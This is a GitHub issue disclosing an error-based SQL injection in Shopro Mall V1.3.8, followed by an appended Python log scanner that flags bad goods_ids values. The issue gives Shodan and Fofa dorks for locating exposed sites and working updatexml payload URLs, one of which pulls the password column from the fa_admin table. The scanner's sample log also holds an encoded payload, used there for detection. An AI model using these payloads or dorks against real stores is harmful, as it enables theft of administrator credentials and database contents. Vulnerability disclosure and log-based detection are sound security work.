There's SQL injection in Shopro Mall system V1.3.8 #16

Open
secf0ra11 opened this issue Aug 8, 2022 · 0 comments

Shopro Mall system V1.3.8 Value parameter has SQL injection

Shopro Mall system

Official Website: https://shopro.top
Github: https://github.com/ITmonkey-cn/shopro.git

Search

shodan: http.title:"shopro"
fofa: title="shopro"

Vulnerability Type

Error-Based SQL Injection

Vulnerability Version

V1.3.8

Recurring environment:

  • ubuntu
  • python3.7

Vulnerability Description AND recurrence

  1. F12 find something interesting

  2. parameter goods_ids has SQL error message

    http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -
    
  3. Find information with Error-Based SQL Injection

    http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select group_concat(password) from fa_admin),0x7e),1)-- -
    

Ref

https://github.com/secf0ra11/secf0ra11.github.io/blob/main/Shopro_SQL_injection.md
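
A defensive check for the parameter described in this report, as an added example that is not part of the original issue or the Shopro code base: it scans access-log lines for requests to the endpoint above whose `goods_ids` value is not a plain comma-separated list of integers. The log format, the sample lines and the assumption that legitimate values are integer lists are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter named in the report.
ENDPOINT = "/addons/shopro/goods/lists"
PARAM = "goods_ids"

# Assumption: legitimate values are ASCII integer lists such as "32" or "32,33".
ID_LIST = re.compile(r"[0-9]+(,[0-9]+)*")

# Assumed common/combined log format; ".+?" tolerates raw spaces in the URL.
REQUEST = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+"')


def is_valid_goods_ids(value):
    """Allow-list check: True only for a comma-separated list of integers."""
    return ID_LIST.fullmatch(value) is not None


def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for ENDPOINT requests failing the allow-list."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path != ENDPOINT:
            continue
        # parse_qs percent-decodes, so encoded payloads are checked in decoded form.
        for value in parse_qs(url.query).get(PARAM, []):
            if not is_valid_goods_ids(value):
                hits.append((number, value))
    return hits


# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Aug/2022:10:00:01 +0000] "GET /addons/shopro/goods/lists?page=1&goods_ids=32,33 HTTP/1.1" 200 512',
    '198.51.100.9 - - [08/Aug/2022:10:00:05 +0000] "GET /addons/shopro/goods/lists?page=1&goods_ids=32%29%2Cupdatexml%281%2C1%2C1%29--%20- HTTP/1.1" 200 301',
    '198.51.100.7 - - [08/Aug/2022:10:00:09 +0000] "GET /favicon.ico HTTP/1.1" 200 2048',
    '198.51.100.8 - - [08/Aug/2022:10:00:12 +0000] "GET /addons/shopro/goods/lists?page=1&goods_ids=32 33 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: rejected goods_ids={value!r}")
```

The same allow-list applied server-side before the value reaches any query rejects the request outright instead of only flagging it afterwards.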
